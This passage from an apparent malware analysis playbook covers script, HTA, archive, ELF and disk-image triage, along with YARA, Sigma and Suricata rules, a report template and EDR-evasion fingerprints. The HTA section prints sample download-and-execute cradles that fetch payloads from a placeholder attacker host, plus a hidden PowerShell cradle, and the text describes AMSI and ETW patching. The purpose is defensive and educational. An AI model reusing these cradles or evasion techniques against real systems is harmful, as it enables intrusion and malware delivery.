Execute / ExecuteGlobal / Eval — dynamic code execution. SAFE deobfuscation idiom: swap the runtime-execution call for WScript.Echo() so the payload prints instead of running, then re-run with cscript /nologo in the analysis VM:

' Original
ExecuteGlobal(decodedPayload)

' Replace with this for safe extraction
WScript.Echo(decodedPayload)

GetObject("new:{CLSID}") — alternative to CreateObject that avoids the literal string WScript.Shell in the source. CLSID {72C24DD5-D70A-438B-8A42-98424B88AFB8} is the Windows Script Host shell instance — flag it on sight.

Variable substitution tracing: for chained obfuscation, follow each variable from its assignment to its use and reconstruct the final value by hand. Most VBScript loaders are <300 lines and tractable to trace manually.

Common malicious patterns to flag:

• CreateObject("WScript.Shell").Run — command execution
• CreateObject("MSXML2.XMLHTTP") / WinHttp.WinHttpRequest.5.1 — HTTP download cradles
• CreateObject("ADODB.Stream") — binary file writes (drops PE payloads to disk)
• CreateObject("Scripting.FileSystemObject") — file system operations
• GetObject("winmgmts:...") — WMI access (process spawn / system enumeration)
• Shell.Application — Explorer shell invocation (can bypass some restrictions)
• Eval() / Execute() / ExecuteGlobal() — dynamic execution; always deobfuscate before analyzing

**JavaScript (JS) analysis:**
```bash
# Beautify obfuscated JS
cat malicious.js | js-beautify > beautified.js

# Or use online tools
# https://beautifier.io/

# Look for:
# - eval() - executes string as code
# - unescape(), decodeURIComponent() - decode strings
# - ActiveXObject - COM object creation (Windows only)
# - WScript.Shell, WScript.CreateObject

6.5 Archive Analysis

Inspect archives safely:

# List contents without extraction
7z l archive.zip
unzip -l archive.zip
tar -tzf archive.tar.gz

# Look for:
# - Double extensions (invoice.pdf.exe)
# - LNK files (Windows shortcuts)
# - Executable files masquerading as documents
# - Nested archives (archive.zip -> archive2.zip -> payload.exe)

# Extract to isolated directory
7z x archive.zip -o/tmp/extracted/

# Check extracted file types
cd /tmp/extracted/
file *

Analyze LNK (shortcut) files:

# Parse LNK file with LECmd (Windows)
LECmd.exe -f malicious.lnk

# Or use lnk-parser (Linux)
lnkinfo malicious.lnk

# Look for:
# - Target path (what it executes)
# - Command line arguments
# - Working directory
# - Icon location (may reveal payload location)

6.6 Linux/ELF Analysis

Basic ELF analysis:

# File type and architecture
file suspicious.bin
# Output: ELF 64-bit LSB executable, x86-64

# ELF header
readelf -h suspicious.bin

# Section headers
readelf -S suspicious.bin

# Program headers
readelf -l suspicious.bin

# Symbol table
readelf -s suspicious.bin

# Check for suspicious libraries
ldd suspicious.bin

# Look for:
# - libc.so (standard)
# - libssl.so (network encryption)
# - libcrypto.so (cryptography)
# - Unusual paths (/tmp/lib.so)

Dynamic analysis (Linux malware):

# Use strace to monitor system calls
strace -f -e trace=network,file,process ./suspicious.bin

# Monitor file operations
strace -e trace=open,read,write,close ./suspicious.bin

# Monitor network operations
strace -e trace=socket,connect,send,recv ./suspicious.bin

# ltrace to monitor library calls
ltrace -f ./suspicious.bin

6.7 HTA (HTML Application) Analysis

HTA files (.hta) are HTML documents executed by mshta.exe (Microsoft HTML Application Host) instead of a browser. Because mshta.exe is a signed Microsoft binary, the script runs with the full privileges of the current user with no browser sandbox — full COM, ActiveX, and filesystem access. HTAs are routinely used in phishing chains, often dropped inside ISO/ZIP archives.

MITRE ATT&CK: T1218.005 — System Binary Proxy Execution: Mshta.

Detection:

file suspicious.hta
# Output is typically "HTML document text" — always verify the .hta extension separately

strings suspicious.hta | grep -iE "mshta|WScript|Shell|ActiveX|XMLHTTP|powershell|CreateObject"

Static triage approach: HTAs are plain text. Open in any editor — never double-click.

1. Pull script blocks. grep -A 50 "<script" suspicious.hta and identify the language attribute (VBScript / JScript / mixed).
2. Enumerate every COM instantiation. ActiveX/COM is the entire attack surface in HTAs:

   grep -nE "CreateObject|new ActiveXObject|GetObject" suspicious.hta

   Common malicious objects:
   • WScript.Shell — OS command execution
   • Scripting.FileSystemObject — file I/O, payload drop
   • MSXML2.XMLHTTP / WinHttp.WinHttpRequest.5.1 — HTTP download cradle
   • ADODB.Stream — binary file writes (drops PE to disk)
   • Shell.Application — Explorer shell, can bypass some restrictions
3. Find execution sinks:

   grep -iE "Shell\.Run|ShellExecute|powershell|cmd\.exe|wscript|cscript|regsvr32|rundll32|msiexec" suspicious.hta

4. Decode embedded payloads. HTA loaders frequently stash payloads in innerHTML of hidden divs or in script-scope variables:

   grep -oE "[A-Za-z0-9+/]{40,}={0,2}" suspicious.hta   # base64 candidates
   grep -oE "&#[0-9]+;" suspicious.hta                  # HTML-entity encoded
   grep -oE "%[0-9A-Fa-f]{2}" suspicious.hta            # percent-encoded

   Decode base64:

   echo "<base64-blob>" | base64 -d > stage2.bin
   file stage2.bin

5. Apply the §6.4 VBScript deobfuscation idiom (swap Execute / ExecuteGlobal for WScript.Echo and re-run with cscript /nologo in the lab VM) to extract chained payloads safely.

Canonical malicious HTA patterns:

XMLHTTP download-and-drop cradle:

Set xhr = CreateObject("MSXML2.XMLHTTP")
xhr.Open "GET", "http://malicious[.]com/payload.exe", False
xhr.Send
Set s = CreateObject("ADODB.Stream") : s.Type = 1 : s.Open
s.Write xhr.responseBody
s.SaveToFile "C:\Users\Public\payload.exe", 2 : s.Close
CreateObject("WScript.Shell").Run "C:\Users\Public\payload.exe"

PowerShell cradle invocation:

CreateObject("WScript.Shell").Run "powershell -nop -w hidden -enc <base64>", 0, False

Inline mshta.exe URL invocation (seen in phishing links):

mshta.exe javascript:a=(GetObject("script:http://malicious[.]com/payload.sct")).Exec();close();

Dynamic confirmation: in the analysis VM, run Procmon filtered on Process Name is mshta.exe. Inspect every CreateFile, WriteFile, RegSetValue, and Process Create event — they reveal dropped paths, persistence keys, and child-process command lines.

6.8 Disk Image Analysis (ISO / IMG / VHD / VHDX)

Disk-image containers are a MOTW (Mark-of-the-Web) bypass primitive. When a file is downloaded from the internet, Windows attaches a Zone.Identifier:$DATA ADS marking it Zone 3 (untrusted) — SmartScreen, Office Protected View, and the Win10/11 LNK warning all key on this. Files extracted from a mounted ISO / VHD do not inherit the parent image's MOTW, so payloads inside execute without those prompts. On Windows 10+ .iso auto-mounts as a virtual DVD on double-click and .vhd / .vhdx auto-mount as virtual disks.

MITRE ATT&CK: T1553.005 — Subvert Trust Controls: Mark-of-the-Web Bypass.

Detection:

file suspicious.iso   # "ISO 9660 CD-ROM filesystem data"
file suspicious.img   # "DOS/MBR boot sector" or "Linux rev 1.0 ext2 filesystem data"
file suspicious.vhd   # "Microsoft Disk Image, Virtual Server or Virtual PC, version 0x00010000"
file suspicious.vhdx  # "Microsoft Disk Image eXtended"

Always analyze read-only and never execute contents outside the analysis VM.

Option A — extract without mounting (safest, cross-platform):

7z l suspicious.iso                       # list first
mkdir /tmp/iso_contents
7z x suspicious.iso -o/tmp/iso_contents/  # extract
find /tmp/iso_contents/ -type f -exec file {} \;

Option B — read-only loop mount (Linux):

sudo mkdir /mnt/suspicious_iso
sudo mount -o loop,ro suspicious.iso /mnt/suspicious_iso

ls -la /mnt/suspicious_iso/
find /mnt/suspicious_iso/ -type f -exec file {} \;

sudo umount /mnt/suspicious_iso

Option C — read-only mount (Windows analysis VM only):

$img = Mount-DiskImage -ImagePath "C:\analysis\suspicious.iso" -Access ReadOnly -PassThru
$drive = ($img | Get-Volume).DriveLetter
Get-ChildItem "${drive}:\" -Recurse -Force | Select FullName, Attributes, Length
Dismount-DiskImage -ImagePath "C:\analysis\suspicious.iso"

VHD / VHDX on Linux — convert to raw first:

sudo apt install qemu-utils
qemu-img convert -f vpc  suspicious.vhd  suspicious_raw.img   # vpc  = VHD
qemu-img convert -f vhdx suspicious.vhdx suspicious_raw.img   # vhdx = VHDX
sudo mount -o loop,ro suspicious_raw.img /mnt/vhd_mount/

What to look for inside:

1. The canonical LNK + hidden DLL / EXE pattern:

   archive.iso/
     Invoice.lnk          <- victim double-clicks this
     document.pdf         <- decoy shown to victim
     payload.dll          <- hidden attribute set; LNK runs it via rundll32
   

   Always check for hidden files (ls -la, Get-ChildItem -Force). Parse every LNK with lnkinfo (Linux) or LECmd.exe (Windows) — record target path, arguments, working directory, icon location.
2. Decoy documents — a benign-looking PDF / DOCX displayed to the victim while the payload runs in the background. Analyze them separately via §6.2 / §6.3.
3. Filename tricks — double extensions (invoice.pdf.exe) and Right-To-Left Override (U+202E) which can flip payloadexe.doc to render as payloadcod.exe:

   find /mnt/iso/ -print | cat -v | grep -v "^[[:print:]]*$"

4. autorun.inf — older but still seen in IMG files.

Routing extracted contents:

Extracted file	Send to
.lnk	Archive Analysis §6.5 (LNK subsection)
.dll / .exe	§3 (Static) → §4 (Dynamic)
.ps1 / .vbs / .js	Script Analysis §6.4
.docm / .xlsm	Office Macro Analysis §6.2
.hta	HTA Analysis §6.7
Nested .zip / .iso	Recurse — repeat §6.5 / §6.8

Always document the MOTW-bypass technique explicitly in the report. It's a defensive-control gap that affects detection-engineering recommendations.

---

7. Classification & TTP Mapping

• Propose malware family or threat cluster (if possible)
• Map behaviors to MITRE ATT&CK:
  • T1055 – Process Injection
  • T1083 – File Discovery
  • T1105 – Remote File Copy
  • T1140 – Deobfuscation

---

8. IOCs & Detection Engineering

8.1 IOC Extraction & Defanging

Extract all IOC types:

# File hashes
sha256sum sample.exe dropped_file1.dll dropped_file2.exe
md5sum sample.exe dropped_file1.dll dropped_file2.exe

# Network indicators from strings/PCAP
grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" floss_output.txt  # IPs
grep -oE "[a-zA-Z0-9.-]+\.(com|net|org|ru|cn)" floss_output.txt  # Domains
tshark -r traffic.pcapng -T fields -e ip.dst | sort -u  # Contacted IPs
tshark -r traffic.pcapng -Y dns -T fields -e dns.qry.name | sort -u  # DNS queries

# Registry keys from Procmon/Regshot
grep "RegSetValue" procmon.csv | awk -F',' '{print $5}' | sort -u

# Mutexes from System Informer or strings
strings sample.exe | grep -i "mutex\|global\\\\"

# User-Agents from PCAP
tshark -r traffic.pcapng -Y http -T fields -e http.user_agent | sort -u

Defang IOCs for safe sharing:

# Defanging patterns
# http:// → hxxp://
# https:// → hxxps://
# . → [.]
# @ → [@]

# Examples:
# malicious.com → malicious[.]com
# http://evil.com/payload.exe → hxxp://evil[.]com/payload[.]exe
# attacker@evil.com → attacker[@]evil[.]com
# 192.168.1.100 → 192[.]168[.]1[.]100

# Automated defanging with ioc-fanger (Python)
pip install ioc-fanger
echo "http://malicious.com" | fanger --defang

# Or manual sed replacement
echo "http://malicious.com/payload.exe" | sed 's/http:/hxxp:/g; s/\./[.]/g'

8.2 IOC Confidence & Volatility Rating

IOC Type	Confidence	Volatility	Notes
File hash	High	Static	Unique to specific sample
Mutex name	High	Static	Hardcoded in malware
Registry key	High	Static	Persistence mechanism
IP address	Medium	Dynamic	May change (DGA, fast-flux)
Domain (C2)	Medium	Dynamic	May change frequently
User-Agent	Low	Dynamic	Common strings, high false positive
File path	Medium	Static	May vary by environment
PDB path	High	Static	Reveals dev environment
Certificate hash	High	Static	Used for code signing

8.3 YARA Rule Creation

Basic YARA rule template:

rule Malware_Family_Emotet_Variant_A {
    meta:
        description = "Detects Emotet variant A based on strings and imports"
        author = "Analyst Name"
        date = "2025-10-05"
        reference = "CASE-2025-1005-001"
        hash = "a1b2c3d4e5f6..."

    strings:
        $s1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" ascii
        $s2 = "C:\\Windows\\SysWOW64\\rundll32.exe" wide
        $s3 = { 4D 5A 90 00 03 00 00 00 }  // MZ header
        $mutex = "Global\\M12345" wide nocase

        $api1 = "VirtualAlloc" ascii
        $api2 = "CreateRemoteThread" ascii
        $api3 = "WriteProcessMemory" ascii

    condition:
        uint16(0) == 0x5A4D and  // PE file
        filesize < 500KB and
        2 of ($s*) and
        all of ($api*)
}

Test YARA rule:

# Test against sample
yara malware_rule.yar sample.exe

# Scan directory
yara -r malware_rule.yar /path/to/samples/

# Save matches to file
yara -r malware_rule.yar /path/to/samples/ > matches.txt

YARA rule repositories:

• https://github.com/Yara-Rules/rules
• https://github.com/Neo23x0/signature-base
• https://github.com/reversinglabs/reversinglabs-yara-rules

8.4 Sigma Rule Creation

Sigma rule for malicious behavior (Sysmon Event ID 1 - Process Creation):

Generate a real UUID4 per rule — never copy a placeholder. Use python3 -c "import uuid; print(uuid.uuid4())" or uuidgen. Reusing example UUIDs in production rules causes silent merge collisions in SigmaHQ and downstream SIEMs.

title: Suspicious PowerShell Download Cradle
id: b8e4d2f9-7a1c-4e3b-9c5a-2f8d6e1b3a4c   # example only — regenerate before deploying
status: experimental
description: Detects PowerShell download cradle execution
references:
    - https://attack.mitre.org/techniques/T1059/001/
author: Analyst Name
date: 2025-10-05
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains|all:
            - 'DownloadString'
            - 'Invoke-Expression'
    condition: selection
falsepositives:
    - Legitimate administrative scripts
level: high

Convert Sigma to SIEM queries (sigma-cli, modern replacement for legacy sigmac):

# Install sigma-cli (PyPI package: sigma-cli; legacy `sigmac` is deprecated)
pip install sigma-cli

# Convert to Splunk
sigma convert -t splunk rule.yml

# Convert to Elastic (Elasticsearch Lucene / EQL backends)
sigma convert -t elasticsearch rule.yml

# Convert to QRadar
sigma convert -t qradar rule.yml

# Convert to Microsoft Sentinel (KQL)
sigma convert -t sentinel rule.yml

8.5 Suricata Rule Creation

Network IDS rule for C2 traffic (Suricata 5+ sticky-buffer syntax):

Legacy modifier-style syntax (content:"POST"; http_method;) was deprecated in Suricata 5. Modern rules use sticky buffers (http.method; content:"POST";) — keyword first, then content matches that follow apply to that buffer until another sticky buffer or pkt_data; is set.

alert http $HOME_NET any -> $EXTERNAL_NET any ( \
    msg:"ET MALWARE Emotet C2 Checkin"; \
    flow:established,to_server; \
    http.method; content:"POST"; \
    http.uri; content:"/"; depth:1; \
    http.user_agent; content:"Mozilla/5.0 (Windows NT 10.0|3b| Win64|3b| x64)"; \
    sid:1000001; rev:1; \
    metadata:created_at 2025_10_05; \
    classtype:trojan-activity; \
)

Use SID range 1000000–1999999 for site-local custom rules; 2000000+ is reserved for Emerging Threats. Reusing ET SIDs causes merge conflicts on rule update.

DNS-based detection:

alert dns $HOME_NET any -> any 53 (msg:"ET MALWARE Suspicious DGA Domain Query"; dns.query; content:".tk"; nocase; sid:1234568; rev:1;)

Test Suricata rules:

# Test rule syntax
suricata -T -c /etc/suricata/suricata.yaml -S custom.rules

# Run Suricata on PCAP
suricata -r sample_traffic.pcapng -S custom.rules -l /var/log/suricata/

---

9. Reporting & Documentation

9.1 Malware Analysis Report Template

# Malware Analysis Report

## Executive Summary
- **Malware Family:** Emotet (Variant A)
- **Threat Level:** High
- **Initial Vector:** Phishing email with malicious attachment
- **Primary Capability:** Banking trojan, credential theft, lateral movement
- **Recommended Action:** Block all network IOCs, hunt for persistence mechanisms

---

## Case Metadata

| Field              | Value                                    |
|--------------------|------------------------------------------|
| Case ID            | CASE-2025-1005-001                       |
| Sample ID          | SAM-20251005-1430-001                    |
| Analyst            | Analyst Name                             |
| Analysis Date      | 2025-10-05                               |
| Filename (original)| invoice_2025.exe                         |
| SHA256             | a1b2c3d4e5f6...                          |
| File Size          | 245 KB                                   |
| File Type          | PE32 executable (GUI) x86, for MS Windows|

---

## Technical Analysis

### Static Analysis

**File Properties:**
- Compiler: Microsoft Visual C++ 8.0
- Timestamp: 2025-09-28 14:23:11 UTC (possibly forged)
- Digital Signature: None
- Packer: UPX (detected and unpacked)
- Entropy: 7.2 (high - indicates encryption/packing)

**Capabilities (CAPA):**
- Network communication (URLDownloadToFile, InternetOpen)
- Process injection (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread)
- Persistence via registry (RegSetValue)
- Credential theft (CredEnumerate, LsaEnumerateLogonSessions)

**Suspicious Strings:**
- hxxp://malicious[.]com/payload[.]exe
- 192[.]168[.]56[.]101
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run
- Global\M12345 (mutex)
- C:\Users\Public\svchost.exe (dropped file)

### Dynamic Analysis

**Execution Flow:**
1. Creates mutex "Global\M12345" to prevent multiple infections
2. Drops secondary payload to C:\Users\Public\svchost.exe
3. Establishes persistence via registry Run key
4. Injects code into explorer.exe
5. Connects to C2 server at 192[.]168[.]56[.]101:443
6. Exfiltrates credentials via HTTP POST

**Persistence Mechanisms:**
- Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Defender
- Scheduled Task: N/A
- Service: N/A

**Network Behavior:**
- DNS queries: malicious[.]com, c2-server[.]tk
- C2 communication: HTTPS POST to 192[.]168[.]56[.]101:443
- User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
- Beacon interval: 60 seconds

---

## Indicators of Compromise (IOCs)

### File Hashes
| Hash Type | Value                                                              |
|-----------|--------------------------------------------------------------------|
| SHA256    | a1b2c3d4e5f6789012345678901234567890123456789012345678901234567890 |
| SHA1      | 1234567890abcdef1234567890abcdef12345678                           |
| MD5       | 12345678901234567890123456789012                                   |

### Dropped Files
| Filename                     | SHA256            | Path                        |
|------------------------------|-------------------|-----------------------------|
| svchost.exe                  | b2c3d4e5f6...     | C:\Users\Public\svchost.exe |

### Network Indicators (Medium Confidence - Dynamic)
| Type   | Value (Defanged)          | Context            |
|--------|---------------------------|--------------------|
| Domain | malicious[.]com           | C2 server          |
| Domain | c2-server[.]tk            | Backup C2          |
| IP     | 192[.]168[.]56[.]101      | C2 IP address      |
| URL    | hxxps://malicious[.]com/api | C2 callback URL  |

### Host Indicators (High Confidence - Static)
| Type         | Value                                                   |
|--------------|---------------------------------------------------------|
| Mutex        | Global\M12345                                           |
| Registry Key | HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Defender |
| File Path    | C:\Users\Public\svchost.exe                             |

---

## MITRE ATT&CK Mapping

| Tactic           | Technique ID  | Technique Name                  | Evidence                          |
|------------------|---------------|---------------------------------|-----------------------------------|
| Execution        | T1059.003     | Windows Command Shell           | cmd.exe spawned by sample         |
| Persistence      | T1547.001     | Registry Run Keys               | HKCU\...\Run key created          |
| Defense Evasion  | T1055.001     | Process Injection               | Code injected into explorer.exe   |
| Credential Access| T1003.001     | LSASS Memory Dump               | LsaEnumerateLogonSessions called  |
| Command & Control| T1071.001     | Web Protocols (HTTP/HTTPS)      | HTTPS POST to C2                  |
| Exfiltration     | T1041         | Exfiltration Over C2 Channel    | Credentials sent via HTTP POST    |

---

## Detection & Hunting Guidance

### YARA Rule
```yara
rule Malware_Emotet_VariantA {
    meta:
        description = "Detects Emotet variant A"
        author = "Analyst Name"
        date = "2025-10-05"
        hash = "a1b2c3d4e5f6..."
    strings:
        $mutex = "Global\\M12345" wide
        $c2 = "malicious.com" ascii
        $ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" ascii
    condition:
        uint16(0) == 0x5A4D and 2 of them
}

### Sigma Rule (Process Creation)
```yaml
title: Emotet Registry Persistence
detection:
    selection:
        CommandLine|contains: 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'
    condition: selection


### Hunting Queries

**Splunk:**

index=windows EventCode=1 (CommandLine="*HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run*" OR Image="*\\svchost.exe" AND Image!="C:\\Windows\\System32\\svchost.exe")


**Elastic:**

event.code:1 AND (process.command_line:*HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run* OR (process.executable:*svchost.exe AND NOT process.executable:C\:\\Windows\\System32\\svchost.exe))


---

## Recommendations

### Immediate Actions
1. **Block network IOCs** at firewall/proxy (malicious[.]com, c2-server[.]tk, 192.168.56.101)
2. **Hunt for mutex** "Global\M12345" on endpoints
3. **Check registry Run keys** for "Windows Defender" entry pointing to non-standard path
4. **Search for file** C:\Users\Public\svchost.exe across environment

### Remediation Steps
1. Isolate infected hosts from network
2. Kill malicious processes (svchost.exe in C:\Users\Public\)
3. Delete dropped files and registry persistence
4. Reset credentials for affected users
5. Re-image compromised systems

### Long-term Mitigations
- Enable PowerShell logging (ScriptBlock, Module, Transcription)
- Deploy endpoint detection and response (EDR) solution
- Implement application whitelisting
- User security awareness training on phishing

---

## Appendix

### Evidence Files
- `sample.exe` (original) - SHA256: a1b2c3d4e5f6...
- `sample_unpacked.exe` - SHA256: b2c3d4e5f6...
- `svchost.exe` (dropped) - SHA256: c3d4e5f6...
- `procmon_output.csv` - Process Monitor logs
- `traffic_capture.pcapng` - Network traffic capture
- `regshot_comparison.html` - Registry changes

### Analysis Tools Used
- FLOSS 2.3 (string extraction)
- CAPA 7.0 (capability detection)
- PE-bear 0.6 (PE analysis)
- Procmon 3.95 (behavioral analysis)
- Wireshark 4.0 (network analysis)

### References
- MITRE ATT&CK: https://attack.mitre.org/
- VirusTotal: https://www.virustotal.com/gui/file/<SHA256>
- MalwareBazaar: https://bazaar.abuse.ch/

---

**Report Date:** 2025-10-05
**Last Updated:** 2026-04-25

9.2 Evidence Package Structure

/CASE-2025-1005-001/
  ├── report/
  │   ├── malware_analysis_report.md
  │   └── malware_analysis_report.pdf
  ├── intake/
  │   ├── SAM-20251005-1430-001.7z (password: infected)
  │   └── chain_of_custody.txt
  ├── binaries/
  │   ├── sample.exe (original)
  │   ├── sample_unpacked.exe
  │   └── svchost.exe (dropped)
  ├── static/
  │   ├── floss_output.txt
  │   ├── capa_report.txt
  │   ├── peframe_analysis.txt
  │   └── strings.txt
  ├── dynamic/
  │   ├── procmon_output.csv
  │   ├── regshot_comparison.html
  │   ├── sysmon_logs.evtx
  │   └── traffic_capture.pcapng
  ├── iocs/
  │   ├── iocs.txt (defanged)
  │   ├── iocs.json
  │   └── iocs.csv
  ├── detections/
  │   ├── emotet_variantA.yar
  │   ├── emotet_sigma.yml
  │   └── emotet_suricata.rules
  └── hashes.txt (SHA256 of all files)

9.3 Handoff Checklist

• All file hashes verified in evidence package
• IOCs defanged in report
• Sensitive data (credentials, PII) sanitized
• Detection rules tested against sample
• MITRE ATT&CK mapping complete
• Recommendations reviewed with stakeholders
• Evidence package encrypted (password: infected)
• Report approved by peer reviewer
• Findings briefed to incident response team
• Threat intelligence shared (if authorized)

---

10. Advanced Techniques

10.1 Memory Forensics Integration

Acquire memory dump during dynamic analysis:

# Using FTK Imager (GUI)
# File -> Capture Memory

# Using DumpIt (command line)
DumpIt.exe

# Using WinPMEM
winpmem_mini_x64.exe -o memory.dmp

# Verify memory dump
Get-FileHash memory.dmp -Algorithm SHA256

Analyze with Volatility 3:

# Easy way for Windows memory analysis
# -> https://github.com/gl0bal01/volatility-windows-analysis 

# List available plugins
vol.py -h

# Identify OS profile
vol.py -f memory.dmp windows.info

# List running processes
vol.py -f memory.dmp windows.pslist
vol.py -f memory.dmp windows.pstree

# Find hidden/injected processes
vol.py -f memory.dmp windows.pscan

# Network connections
vol.py -f memory.dmp windows.netscan

# Scan for malware signatures
vol.py -f memory.dmp windows.malfind

# Dump suspicious process memory
vol.py -f memory.dmp -o dump_dir windows.memmap --pid 1234 --dump

# Extract command lines
vol.py -f memory.dmp windows.cmdline

# Registry hives
vol.py -f memory.dmp windows.registry.hivelist
vol.py -f memory.dmp windows.registry.printkey --key "Software\Microsoft\Windows\CurrentVersion\Run"

YARA scan in memory:

# Scan memory dump with YARA rules
vol.py -f memory.dmp windows.yarascan --yara-file malware.yar

10.2 Automated Sandbox Analysis

ANY.RUN (cloud-based):

1. Upload sample to https://app.any.run
2. Select Windows version and network simulation
3. Interact with sample (click buttons, wait for execution)
4. Review process tree, network traffic, file operations
5. Download PCAP and artifacts

Joe Sandbox (cloud/on-prem):

# Submit via jbxapi
jbxapi submit sample.exe --systems win10x64

# Wait for analysis
jbxapi status <submission_id>

# Download report
jbxapi download <submission_id> --type html > joe_report.html
jbxapi download <submission_id> --type json > joe_report.json

10.3 Reverse Engineering Workflow

Disassembly with IDA Pro/Ghidra:

# IDA Pro workflow
1. Open sample.exe in IDA Pro
2. Auto-analysis completes
3. Navigate to Functions window
4. Find entry point (start/main function)
5. Identify interesting functions:
   - Network functions (send, recv, InternetOpen)
   - Crypto functions (CryptEncrypt, AES_encrypt)
   - String decryption routines
6. Set breakpoints for dynamic analysis
7. Use F5 (Hex-Rays) to decompile to pseudocode

# Ghidra workflow (free alternative)
1. Create new project
2. Import sample.exe
3. Analyze with default options
4. Use Symbol Tree to find functions
5. Decompiler window shows pseudocode
6. Look for XREFs to suspicious functions

Dynamic debugging with x64dbg:

1. Open sample.exe in x64dbg
2. Set breakpoints on:
   - VirtualAlloc (memory allocation)
   - CreateRemoteThread (process injection)
   - InternetConnect (network connection)
   - RegSetValue (persistence)
3. Run until breakpoint
4. Step through code (F7 - step into, F8 - step over)
5. Dump decrypted strings or payloads from memory
6. Follow execution flow to understand behavior

Anti-analysis bypass:

Common anti-analysis techniques and bypasses:

| Technique              | Detection Method                     | Bypass                           |
|------------------------|--------------------------------------|----------------------------------|
| IsDebuggerPresent      | Check PEB.BeingDebugged flag         | Patch return value to 0          |
| CheckRemoteDebugger    | NtQueryInformationProcess            | Patch return value               |
| RDTSC timing check     | Measure execution time               | Hardware breakpoints instead     |
| VM detection (CPUID)   | Check hypervisor bit                 | Modify CPUID response            |
| Sandbox sleep evasion  | Sleep(300000) before execution       | Patch sleep call or hook API     |

10.4 Modern EDR / AV Evasion Techniques

Modern post-2022 commodity loaders and APT toolkits routinely chain the techniques below. Recognize the import-table fingerprints during static analysis (§3) and the runtime artifacts during dynamic analysis (§4) so the report's MITRE mapping reflects the real surface.

ETW patching (T1562.006 — Indicator Blocking)

• The malware locates EtwEventWrite (or NtTraceEvent) in ntdll.dll, calls VirtualProtect to make the page writable, and overwrites the function prologue with 0xC3 (a single ret). All ETW telemetry — which most modern EDRs depend on — goes silent for the process for the rest of its lifetime.
• Static fingerprint: GetProcAddress resolving EtwEventWrite / NtTraceEvent followed by VirtualProtect and a tiny WriteProcessMemory / memcpy (1–8 bytes).
• Dynamic fingerprint: suspicious page-protection flips on ntdll!EtwEventWrite followed by absence of expected ETW providers from the process.

AMSI bypass (T1562.001 — Disable or Modify Tools)

• Patches AmsiScanBuffer (or AmsiScanString) inside amsi.dll to short-circuit the scan. Two common patch shapes:
  • Force S_OK (0) plus AMSI_RESULT_CLEAN (0) so the caller treats every buffer as benign.
  • Force E_INVALIDARG (0x80070057) so the caller's "scan failed → fail-open" path is taken.
• Static fingerprint: LoadLibrary("amsi.dll") → GetProcAddress("AmsiScanBuffer") → VirtualProtect → small write (1–8 bytes). Or, in PowerShell loaders: reflection on [System.Management.Automation.AmsiUtils] field amsiInitFailed.
• Effect: malicious PowerShell, VBScript, JScript, and Office macros pass AMSI without scanning. Combine with the §6.4 / §6.7 deobfuscation idioms when triaging the dropped scripts.

Direct syscalls / SysWhispers (Hell's Gate / Halo's Gate / Tartarus Gate) (T1106 — Native API)

• Bypasses user-mode hooks placed by EDRs on ntdll.dll exports by issuing the raw syscall (x64) or sysenter (x86) instruction with the correct System Service Number (SSN) for the target Nt-API. Common targets: NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx, NtMapViewOfSection.
• Static fingerprint: syscall / sysenter instructions inside non-system modules (find with objdump -d sample.exe | grep -E "syscall|sysenter" or IDA "Search → Text"); imports for ntdll.dll look implausibly thin given the observed behavior; runtime SSN-resolution stubs that scan ntdll for mov eax, <imm32>; syscall patterns (Hell's Gate / Halo's Gate signature).
• Effect: EDR user-mode hooks on the corresponding ntdll exports never fire — the kernel side sees the call but the inline instrumentation does not.

PPID spoofing (T1134.004 — Parent PID Spoofing)

• The malware calls OpenProcess on an unrelated, high-privilege process (explorer.exe, svchost.exe), passes that handle to UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_PARENT_PROCESS), then calls CreateProcess with the populated STARTUPINFOEX. The child appears to be parented by the impersonated process in every standard log source.
• Static fingerprint: import combination OpenProcess + InitializeProcThreadAttributeList + UpdateProcThreadAttribute + CreateProcess.
• Dynamic fingerprint: Sysmon Event ID 1 records show implausible parent–child relationships (e.g., winword.exe → cmd.exe masked as explorer.exe → cmd.exe). Cross-check against Event ID 10 (ProcessAccess) from the spoofing process to detect the underlying OpenProcess.

Module stomping / DLL hollowing (T1055.013 — Process Doppelgänging variant)

• LoadLibrary brings a legitimate, signed DLL into memory, then the malware overwrites that DLL's .text section with shellcode and transfers execution there. EDR module-load events show only the trusted DLL; the malicious code runs under its name.
• Static fingerprint: LoadLibraryEx followed by VirtualProtect(PAGE_EXECUTE_READWRITE) and WriteProcessMemory / memcpy targeting the loaded module's base address.
• Distinguish from process hollowing: in stomping, the host process is not suspended; only the loaded DLL is overwritten. In hollowing, a fresh process is spawned suspended, unmapped, and replaced.

Callback-based shellcode execution (T1055 — sub-techniques vary)

• Avoids CreateThread / CreateRemoteThread (heavily monitored) by using legitimate Windows callback APIs to dispatch shellcode. Common primitives: EnumChildWindows, EnumDesktopWindows, CreateTimerQueueTimer, TpAllocWork / TpPostWork / TpReleaseWork, SetTimer, EnumSystemLocales, EnumTimeFormatsEx. The shellcode pointer is passed as the callback argument.
• Static fingerprint: the callback API is called with a target address that resolves to RWX heap or to a VirtualAlloc-returned region rather than an actual code symbol.

Tool support for the analyst:

Tool	Purpose
al-khaser	Tests 170+ anti-analysis checks; validate VM hardening before evasive-sample analysis.
pafish	Lightweight VM/sandbox detection tester; faster than al-khaser for quick checks.
pe-sieve	Scans a running PID for hollowed sections, RWX shellcode, replaced modules; dumps for static analysis.
hollows_hunter	Same family as pe-sieve, scans system-wide.
ScyllaHide	x64dbg / OllyDbg / IDA plugin that transparently patches PEB.BeingDebugged, NtGlobalFlag, NtQueryInformationProcess, GetTickCount, and exception-based detections.
TitanHide	Kernel-mode debugger-hiding driver for samples that bypass user-mode hooks via direct syscalls.

